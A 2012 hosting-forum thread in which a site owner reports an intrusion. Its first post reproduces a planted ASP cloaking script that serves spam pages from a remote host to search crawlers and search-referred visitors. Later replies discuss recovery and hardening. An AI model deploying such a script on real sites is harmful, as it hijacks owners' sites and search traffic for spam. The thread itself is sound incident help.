Strange new folders found in my FTP not uploaded by myself

Discussion in 'TechTalk' started by zarathustra, Jan 24, 2012.

  1. zarathustra

    zarathustra Perch

    I had a big drop in internet traffic yesterday, so was trying to find the reasons for it, and I don't know if this is related, but I've suddenly found some new folders with code created on the 20th January 2012 which certainly didn't come from me! They are folders such as ugg boots, men's boots etc. with two pages in each folder - index.asp and page=index.asp and the following code:


    <%
    user_agent=Request.ServerVariables("HTTP_USER_AGENT")
    Add_Refer=Request.ServerVariables("HTTP_REFERER")
    Add_Ref=Request.ServerVariables("QUERY_STRING")
    strHost=Request.ServerVariables("HTTP_HOST")
    path_info=Request.ServerVariables("PATH_INFO")
    come_from="google.com#google.ae#google.com.ag#google.com.af#google.off.ai#google.am#google.com.ar#google.as#google.at#google.com.au#google.az#google.ba#google.com.bd#google.be#google.bg#google.com.bh#google.bi#google.com.bo#google.com.br#google.bs#google.co.bw#google.com.bz#google.ca#google.cd#google.cg#google.ch#google.ci#google.co.ck#google.cl#google.cn#google.com.co#google.co.cr#google.com.cu#google.de#google.dj#google.dk#google.dm#google.com.do#google.com.ec#google.com.eg#google.es#google.com.et#google.fi#google.com.fj#google.fm#google.fr#google.gg#google.com.gi#google.gl#google.gm#google.gr#google.com.gt#google.com.hk#google.hn#google.hr#google.ht#google.co.hu#google.co.id#google.ie#google.co.il#google.co.im#google.co.in#google.is#google.it#google.co.je#google.com.jm#google.jo#google.co.jp#google.co.ke#google.kg#google.co.kr#google.kz#google.li#google.lk#google.co.ls#google.lt#google.lu#google.lv#google.com.ly#google.co.ma#google.mn#google.ms#google.com.mt#google.mu#google.mw#google.com.mx#google.com.my#google.com.na#google.com.nf#google.com.ni#google.nl#google.no#google.com.np#google.nr#google.nu#google.co.nz#google.com.om#google.com.pa#google.com.pe#google.com.ph#google.com.pk#google.pl#google.pn#google.com.pr#google.pt#google.com.py#google.ro#google.ru#google.rw#google.com.sa#google.com.sb#google.sc#google.se#google.com.sg#google.sh#google.sk#google.sn#google.sm#google.com.sv#google.co.th#google.com.tj#google.tm#google.to#google.tp#google.com.tr#google.tt#google.com.tw#google.com.ua#google.co.ug#google.co.uk#google.com.uy#google.co.uz#google.com.vc#google.co.ve#google.vg#google.co.vi#google.com.vn#google.vu#google.ws#google.co.za#google.co.zm#google.cat#soso.com#yahoo.com#sogou.com#cache.baidu.com#google.cn#g.cn#baidu.com#tom.com#bing.com#21cn.com"
    come_array = split(come_from,"#")
    FolderRoot="dress"
    if check(user_agent)=true then
    url=removedurl
    HTMLCODE=GetHtml(url)
    response.Write HTMLCODE
    else
    For i=0 to ubound(come_array)
    if instr(Add_Refer,come_array(i)) then
    url=removedurl
    HTMLCODE=GetHtml(url)
    response.Write HTMLCODE
    exit for
    end if
    next
    url="removedurl
    HTMLCODE=GetHtml(url)
    response.Write HTMLCODE
    end if
    Function check(user_agent)
    allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")
    check_agent=false
    For agenti=lbound(allow_agent) to ubound(allow_agent)
    If instr(user_agent,allow_agent(agenti))>0 then
    check_agent=true
    exit for
    end if
    Next
    check=check_agent
    End function
    Public Function GetHtml(url)
    Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
    ObjXMLHTTP.Open "GET",url,False
    ObjXMLHTTP.setRequestHeader "User-Agent",url
    ObjXMLHTTP.send
    GetHtml=ObjXMLHTTP.responseBody
    Set ObjXMLHTTP=Nothing
    set objStream = Server.CreateObject("Adodb.Stream")
    objStream.Type = 1
    objStream.Mode =3
    objStream.Open
    objStream.Write GetHtml
    objStream.Position = 0
    objStream.Type = 2
    objStream.Charset = "UTF-8"
    GetHtml = objStream.ReadText
    objStream.Close
    End Function
    %>



    I have changed my login password and FTP password to something much securer. Is there anything else I need to do to prevent this hacker from accessing my account?
  2. zarathustra

    zarathustra Perch

    Just to say, it seems most the damage was done by the hackers changing my robots.txt and blocking me from all search engines. I've restored this file, and hope that it gets picked up by the bots soon and that my website might go back to its high standing.
  3. bro

    bro Perch

    I had my fair share of hacked servers last year, also mostly from Chinese SEO bastards, and gave up trying to figure out how they got in. I'm sure it wasn't FTP, insecure though that is without SSH, or vulnerable CMSs which were not a factor in the hacked sites. Support reckoned it might be down to Frontpage but never really got to the bottom of it.

    Now I automatically scan each site every day using a script to look for file changes. It's not foolproof, but it will at least report every changed file on a site as long as hackers haven't hacked the test script, too... my sites are small enough, and I know them well enough, to quickly spot which files might legitimately change and which do not. Crude, but it works... and better than discovering changes when a client comes complaining.

    I also blocked a lot of IP ranges. None of my sites have any legitimate traffic from China, Ukraine, Russia, and a whole bunch of other hacker havens (does anyone?), so I blocked all traffic from those IPs as they came up until they disappeared from stats. It's extremely laborious, but for a couple of important customers it was worthwhile. Chinese and eastern European hackers operate from US cloud servers, too, so it's not a total solution.
  4. Mio

    Mio Perch

    Hi Bro,
    Would you mind of sharing this script? i'd like to give it a try.... TNX
    :)

  5. zarathustra

    zarathustra Perch

    I'd love to know how they did it; my guess is my password wasn't secure enough, so that's all changed. I found a strange little log file (most of mine are huge in size) around the date the hack took place. Some of it reads:

    GET /goose.asp key=real%20goose%20jackets&key2=2080&key3=1192 200 0 24453 277 297 HTTP/1.1 Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)

    Amongst other files, I found a goose.asp file. Under Google's webmaster tools, it seems to think that the most popular keywords for my site are now, goose, jacket, canada and parka (my site is art related!). I've lost 75% of my normal traffic to my site (I imagine because robots.txt blocked googlebot and all other bots), and just hope Google will reindex everything correctly soon, and that my site will go back to where it was in the search engines. Just a nightmare!

    I will be checking my site on a regular basis too. :)
  6. Stephen

    Stephen US Operations Staff Member

    fckeditor on any domain?

    I have seen fckeditor getting SLAMMED with uploads like this the last weeks. I mean non stop, if I could live watch a mass log on the server I know that there would be something happening at least once a minute with fckeditor.

    All the fckeditor embedded sites are really really getting hit, if in main folder, admin folders, even some allow direct access to them behind what seems like a secure login form, because they have sample uploader scripts that allow direct access. Many times the bots are scanning even hand coded apps using it, and through just normal guesswork and dictionary type hits can find them.

    This is far from the only way they get there, but fckeditor had of late been one KEY reason.

    Also if your site allows uploads at all, I'd recommend you putting in a ticket for us to set the upload folder to no script access, at all. That way your script can read to that folder for thumbnails etc, but no script contained inside that folder will execute even if they are able to bypass in some manner any upload restrictions you have to limit to bmp/jpg/gif/png etc. We are doing this on some sites that we see getting hit hard on gallery apps that have a images folder for uploads and having dozens of asp files in them for hacking their sites as well, due to the insecure uploader allowing asp/asp.net/php pages to upload (and even when restrictions in place sometimes they are able to make a bypass with trickery) so the no execute works well to stop them.
  7. zarathustra

    zarathustra Perch

    I haven't heard of fckeditor before now - it's not something I use, nor do my sites allow uploads.
    I hadn't spotted it before, because the hacking dates were different, and they hadn't inserted new folders/pages, but I've checked the other sites, and some of my existing pages on other sites have been replaced to include the spammer's links. It doesn't change the presentation of the page itself, which is why I didn't pick up on it right away. Am in the process of reuploading the original pages, and choosing some new passwords.
  8. zarathustra

    zarathustra Perch

    In another of my websites that didn't seem to be affected at all, I've found something in the top root directory. Five files - .statspasswd, .bash_logout, .bashrc, .bash_profile and index.html
    These were placed there on the 24th January this year. The statspasswd features my login, but the password is a seemingly random set of numbers and codes that has no bearing with any of my actual passwords.

    The index file says that my website is down for 24 hours whilst maintenance is being carried out.
  9. tanmaya

    tanmaya APAC Operations Staff Member

    .statspasswd is password protection for access to website stats.
    .bash_logout, .bashrc, .bash_profile are system files, used in case of shell access.
    index.html - if you are not sure about it, can be deleted.
  10. zarathustra

    zarathustra Perch

    Thanks Tanmaya. I hadn't updated that website in some time, but those files all appeared on the 24th January according to my FTP software, the same date and time some of my websites got hacked.
  11. tanmaya

    tanmaya APAC Operations Staff Member

    You sure had 'show hidden folders and files' (or its equivalent) enabled in your FTP software before this date?
    I'm asking this because any file starting with a period "." is considered hidden file in Linux.
  12. zarathustra

    zarathustra Perch

    Normally they are hidden, so I'm not sure why it appeared this time.
    I've now removed all the junk links from the hacker, and changed my passwords on databases, login's and FTP passwords. Hopefully that's enough, but I'll keep a daily eye peeled.
  13. Stephen

    Stephen US Operations Staff Member

    Sounds good :)

Share This Page

JodoHost - 26,000 hosting end-users in 100 countries
Plesk Web Hosting
VPS Hosting
H-Sphere Web Hosting
Other Services